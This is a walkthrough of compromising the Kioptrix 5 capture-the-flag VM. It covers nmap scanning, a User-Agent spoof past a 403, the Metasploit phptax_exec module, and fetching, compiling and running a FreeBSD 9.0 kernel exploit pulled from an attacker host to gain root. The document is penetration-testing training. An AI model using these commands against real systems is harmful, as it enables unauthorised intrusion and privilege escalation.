Hack the Kioptrix 5 (CTF Challenge)

In this article we walk through the compromise of Kioptrix 5, the final machine in the rather enjoyable Kioptrix series and an exercise good enough that the OSCP exam lab uses it as a test case.

Download link: https://www.vulnhub.com/entry/kioptrix-2014-5,62/

  • Network scanning (Nmap, netdiscover)
  • Probing the HTTP services (ports 80 & 8080)
  • Identifying an exploit for the web application's vulnerability
  • Exploiting the target with Metasploit
  • Getting root & capturing the flag

Note: after starting the lab, if the Kioptrix VM does not obtain an IP address, remove its network adapter and add it back.

Let's relax and get started!

First, locate the target on the network:

#netdiscover

Our target is 192.168.1.159, so let's scan it with nmap:

#nmap -A 192.168.1.159

The results show one closed port, 22, and two open ports serving HTTP, 80 and 8080.

Opening http://192.168.1.159 shows a page that does practically nothing, so let's view the source to see whether there is anything interesting in it. Spend 5 to 10 minutes on this even if it may turn out to be fruitless.

  • Nothing at all!

Next, open the HTTP service listening on port 8080.

Access was forbidden. The message did not look like a stock error page, though; it read more like a deliberate, hand-made response. I tried every method I knew to get past the 403, but nothing worked, so I decided to use a User Agent Switcher to request the page as other popular browsers, such as Internet Explorer.

Install the User Agent Switcher add-on in Mozilla Firefox and do the following:

Open the Tools menu in the menu bar; a drop-down menu appears. Select Default User Agent, then Internet Explorer from the submenu, and finally Internet Explorer 6.

Fortunately, we now have access to the page, and it lists a directory called phptax/.

Now open the phptax/ link and you will see the following page:

The page is phptax. Phptax is a tax-preparation program for Linux; it is designed to be database-less and keeps its data in one-line text files, so it does not need the SQL database such programs usually rely on. Luckily for us, Metasploit ships an exploit module for phptax; to find it, simply type search phptax in the MSF console.

To use this exploit, type the following in Metasploit:

msf > use exploit/multi/http/phptax_exec
msf exploit(phptax_exec) > set rhost 192.168.1.159
msf exploit(phptax_exec) > set rport 8080
msf exploit(phptax_exec) > exploit

Great! We have command shell session 1 on the victim machine.

Checking the kernel with uname -a shows the target runs FreeBSD 9.0. There is a local privilege-escalation exploit for this kernel version on exploit-db.com; alternatively, search for it from Kali Linux with searchsploit FreeBSD 9.0, as shown below.

Copy the exploit from its default location in the exploitdb package to the working directory you will serve it from:

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c .

On the target we use fetch, because wget is not available there (fetch is FreeBSD's built-in download tool, so it stands in for wget). The file is pulled over HTTP from a web server on our attacker machine (192.168.1.108), compiled, saved as kernel and made executable:

fetch http://192.168.1.108/28718.c
gcc -o kernel 28718.c
chmod 777 kernel

Then run the exploit:

./kernel

Once the exploit has run you should be root. Confirm it with:

id

Next, move to the root home directory:

cd /root

Let's list its contents:

ls

Here we have a text file named congrats.txt, which should be our flag; read it with:

cat congrats.txt
